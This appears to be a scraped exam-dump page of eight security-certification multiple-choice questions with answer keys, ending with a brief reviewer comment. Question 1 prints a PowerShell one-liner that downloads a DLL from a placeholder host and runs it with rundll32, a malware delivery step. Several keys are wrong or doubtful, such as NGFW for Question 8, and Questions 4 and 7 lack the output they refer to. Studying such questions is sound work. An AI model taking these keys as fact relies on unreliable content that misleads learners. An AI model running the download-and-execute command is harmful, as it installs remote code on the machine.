An employee received an email with an unusual file attachment named Updates.lnk. A security analyst reverse engineering what the file does finds that it executes the following script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll Which of the following BEST describes what the analyst found?
A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is changing Windows Update settings.
C. A PowerShell code is displaying a picture.
D. A PowerShell code is configuring environmental variables.
Correct answer: A
Explanation: (visible only to Pass4Test members)
Question 2:
A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack?
A. WAF
B. SIEM
C. DLP
D. NIDS
Correct answer: A
Explanation: (visible only to Pass4Test members)
Question 3:
A store receives reports that shoppers' credit card information is being stolen. Upon further analysis, those same shoppers also withdrew money from an ATM in that store.
The attackers are using the targeted shoppers' credit card information to make online purchases. Which of the following attacks is the MOST probable cause?
A. Identity theft
B. RFID cloning
C. Shoulder surfing
D. Card skimming
Correct answer: D
Explanation: (visible only to Pass4Test members)
Question 4:
A security analyst is investigating network issues between a workstation and a company server. The workstation and server occasionally experience service disruptions, and employees are forced to reconnect to the server. In addition, some reports indicate sensitive information is being leaked from the server to the public.
The workstation IP address is 192.168.1.103, and the server IP address is 192.168.1.101.
The analyst runs arp -a on a separate workstation and obtains the following results:
Which of the following is most likely occurring?
A. On-path attack
B. MAC flooding attack
C. Evil twin attack
D. Domain hijacking attack
Correct answer: A
Explanation: (visible only to Pass4Test members)
Question 5:
A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?
A. SSD snapshot
B. Image volatile memory
C. Extract from checksums
D. pcap reassembly
Correct answer: B
Explanation: (visible only to Pass4Test members)
Question 6:
A web server log contains two million lines. A security analyst wants to obtain the next 500 lines starting from line 4,600. Which of the following commands will help the security analyst to achieve this objective?
A. cat webserver.log | tail -4600 | head -500 |
B. cat webserver.log | head -5100 | tail -500 |
C. cat webserver.log | tail -1995400 | tail -500 |
D. cat webserver.log | head -4600 | tail +500 |
Correct answer: B
Explanation: (visible only to Pass4Test members)
Question 7:
A user reports constant lag and performance issues with the wireless network when working at a local coffee shop. A security analyst walks the user through an installation of Wireshark and gets a five-minute pcap to analyze. The analyst observes the following output:
Which of the following attacks does the analyst most likely see in this packet capture?
A. Evil twin
B. Bluejacking
C. ARP poisoning
D. Session replay
Correct answer: A
Explanation: (visible only to Pass4Test members)
Question 8:
A security engineer is concerned about using an agent on devices that relies completely on defined known-bad signatures. The security engineer wants to implement a tool with multiple components including the ability to track, analyze, and monitor devices without reliance on definitions alone. Which of the following solutions best fits this use case?
A. EDR
B. DLP
C. HIPS
D. NGFW
Correct answer: D
Miura -
I think this alone is fine, but if you want to be thorough, go further.
I think it is a solid piece of work, so I intend to use it extensively.